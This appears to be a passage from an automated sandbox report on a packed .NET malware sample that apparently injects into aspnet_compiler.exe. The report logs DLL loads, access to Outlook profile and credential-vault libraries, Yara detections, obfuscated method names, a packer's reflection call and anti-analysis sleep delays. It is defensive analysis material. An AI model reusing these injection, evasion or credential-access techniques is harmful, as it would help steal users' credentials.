                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                      Source: 6SQADa3zKv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 6SQADa3zKv.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: 6SQADa3zKv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: BATMAN.pdbxD source: 6SQADa3zKv.exe, 00000000.00000002.2123697598.0000000002760000.00000004.08000000.00040000.00000000.sdmp, 6SQADa3zKv.exe, 00000000.00000002.2123823559.00000000027E1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.2182297243.0000000000942000.00000002.00000001.01000000.00000008.sdmp
                      Source: Binary string: BATMAN.pdb source: 6SQADa3zKv.exe, 00000000.00000002.2123697598.0000000002760000.00000004.08000000.00040000.00000000.sdmp, 6SQADa3zKv.exe, 00000000.00000002.2123823559.00000000027E1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Oct21.pdb source: 6SQADa3zKv.exe

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 6SQADa3zKv.exe, nSeEfBPrNNOOsnl8nXl.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Yara detected aPLib compressed binary
                      Source: Yara matchFile source: 0.2.6SQADa3zKv.exe.384ab08.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6SQADa3zKv.exe PID: 5948, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5748, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeCode function: 0_2_00C82621 push cs; retf 0_2_00C82628
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AD4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AFC
                      Source: 6SQADa3zKv.exeStatic PE information: section name: .text entropy: 7.412026734524428
                      Source: 6SQADa3zKv.exe, Form1.csHigh entropy of concatenated method names: 'Dispose', 'M7PQJd9CC', 'ai7SFRhA5', 'vdd5aFHpK', 'UXNfvJSBH', 'u3b4W1W6Y', 'HsF0U0uOO', 'FUdFnOTPU', 'x0MUu1hpn', 'MUwWETmYN'
                      Source: 6SQADa3zKv.exe, zTKw6eRApWlZpDn0Z2.csHigh entropy of concatenated method names: 'IfwPzm43eM', 'SK81H7I7Tj', 'rDp1PAFHor', 'DpE11IIQkK', 'jeu1sroaFR', 'vL41EEwEl7', 'FZ917wcOWi', 'J7N1bugLFy', 'YIQ1JsObJ5', 'ifr1wbAW4U'
                      Source: 6SQADa3zKv.exe, nSeEfBPrNNOOsnl8nXl.csHigh entropy of concatenated method names: 'BJLEdgYTt6', 'KDikMXewCI', 'ixhEn5ja52', 's35E6llx3b', 'V8tEmp0H02', 'RJGELNQQrs', 'XPonKhLtDXiD7', 'gIKs54yn1k', 'huIsf9RFTU', 'pAGs4gB0Qw'
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeMemory allocated: 990000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeMemory allocated: 27E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeMemory allocated: 47E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe TID: 5052Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 2888Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 60000Jump to behavior
                      Source: 6SQADa3zKv.exe, 00000000.00000002.2123958645.00000000039C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
                      Source: 6SQADa3zKv.exe, 00000000.00000002.2123958645.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, 6SQADa3zKv.exe, 00000000.00000002.2123958645.0000000003A55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
                      Source: 6SQADa3zKv.exe, 00000000.00000002.2123958645.0000000003AE4000.00000004.00000800.00020000.00000000.sdmp, 6SQADa3zKv.exe, 00000000.00000002.2123958645.0000000003962000.00000004.00000800.00020000.00000000.sdmp, 6SQADa3zKv.exe, 00000000.00000002.2123958645.000000000388D000.00000004.00000800.00020000.00000000.sdmp, 6SQADa3zKv.exe, 00000000.00000002.2123958645.000000000390C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byr
                      Source: 6SQADa3zKv.exe, 00000000.00000002.2123958645.0000000003A9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %vL+o+HIpxflaQUFdyuioERPAot/W4EM5/xTa5gjxAAAAAGFXntLKgBbAfHB9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKgBbAvotC0B06uz5XPhM/Q42Rw/ZmRbohjLNQAAAAAGFXntLKgBbA55VlonSSerVyzUKNGzyf6daF/3B3nIS/AAAAAEz4eZtavaLAAAAAADd5O
                      Source: aspnet_compiler.exe, 00000002.00000002.2182495250.0000000000E48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
